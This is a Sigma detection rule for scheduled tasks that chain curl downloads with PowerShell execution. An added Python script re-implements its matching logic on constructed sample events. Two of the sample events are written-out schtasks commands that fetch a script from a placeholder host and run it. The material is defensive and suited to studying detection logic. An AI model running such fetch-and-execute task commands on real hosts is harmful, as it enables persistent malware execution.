Sample rules
Scheduled Task Creation with Curl and PowerShell Execution Combo
- source: sigma
- techniques:
  - t1053
  - t1053.005
  - t1105
  - t1218
Description
Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them. This combination facilitates executing malicious payloads or connecting to a C&C server persistently without dropping the malware sample on the host.
Detection logic
selection_curl:
  CommandLine|contains|all:
    - 'curl '
    - http
    - -o
selection_img:
  CommandLine|contains|windash: ' /create '
  Image|endswith: \schtasks.exe
selection_powershell:
  CommandLine|contains: powershell
condition: all of selection_*
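To show how the three selections combine under `all of selection_*`, here is an added Python re-implementation of the rule's matching logic (case-insensitive `contains`, `endswith`, and the `windash` switch-prefix variants) run over a few constructed Sysmon-style process-creation events. This is example code, not part of the rule or of Sigma; the `Image` and `CommandLine` field names follow the rule, and the events and hostnames are made up.

```python
from typing import Dict, List

# Constructed sample process-creation events (Sysmon Event ID 1 style fields);
# the hostname and paths are placeholders, not observed telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # 0: the full combo in one command line -> should match
        "Image": r"C:\Windows\System32\schtasks.exe",
        "CommandLine": r'schtasks.exe /create /sc minute /mo 5 /tn Sync /tr "cmd /c curl http://files.example.invalid/s.ps1 -o C:\Users\Public\s.ps1 && powershell -File C:\Users\Public\s.ps1"',
    },
    {   # 1: same combo with the dash form of the switch -> windash should still match
        "Image": r"C:\Windows\System32\schtasks.exe",
        "CommandLine": r'schtasks.exe -create -sc onlogon -tn Sync -tr "curl http://files.example.invalid/s.ps1 -o s.ps1 & powershell .\s.ps1"',
    },
    {   # 2: ordinary scheduled task, no download and no PowerShell -> no match
        "Image": r"C:\Windows\System32\schtasks.exe",
        "CommandLine": r'schtasks.exe /create /sc daily /tn Backup /tr "C:\Tools\backup.exe"',
    },
    {   # 3: curl + powershell but not via schtasks.exe -> selection_img fails, no match
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'cmd.exe /c curl http://files.example.invalid/s.ps1 -o s.ps1 && powershell .\s.ps1',
    },
]

def contains_all(value: str, needles: List[str]) -> bool:
    """Sigma 'contains|all': every needle is a case-insensitive substring."""
    v = value.lower()
    return all(n.lower() in v for n in needles)

def contains_windash(value: str, needle: str) -> bool:
    """Sigma 'contains|windash': a '/' switch prefix in the needle also matches '-'."""
    return any(contains_all(value, [needle.replace("/", dash)]) for dash in ("/", "-"))

def rule_matches(event: Dict[str, str]) -> bool:
    """Evaluate 'condition: all of selection_*' for one event."""
    cmd = event.get("CommandLine", "")
    image = event.get("Image", "")
    selection_curl = contains_all(cmd, ["curl ", "http", "-o"])
    selection_img = (image.lower().endswith(r"\schtasks.exe")
                     and contains_windash(cmd, " /create "))
    selection_powershell = contains_all(cmd, ["powershell"])
    return selection_curl and selection_img and selection_powershell

def matching_indices(events: List[Dict[str, str]]) -> List[int]:
    """Return the indices of events the rule would alert on."""
    return [i for i, ev in enumerate(events) if rule_matches(ev)]

if __name__ == "__main__":
    print("alerts on events:", matching_indices(SAMPLE_EVENTS))  # → [0, 1]
```

Event 3 shows the rule's scope: the same curl and PowerShell chain launched by anything other than schtasks.exe is outside this rule and needs separate coverage.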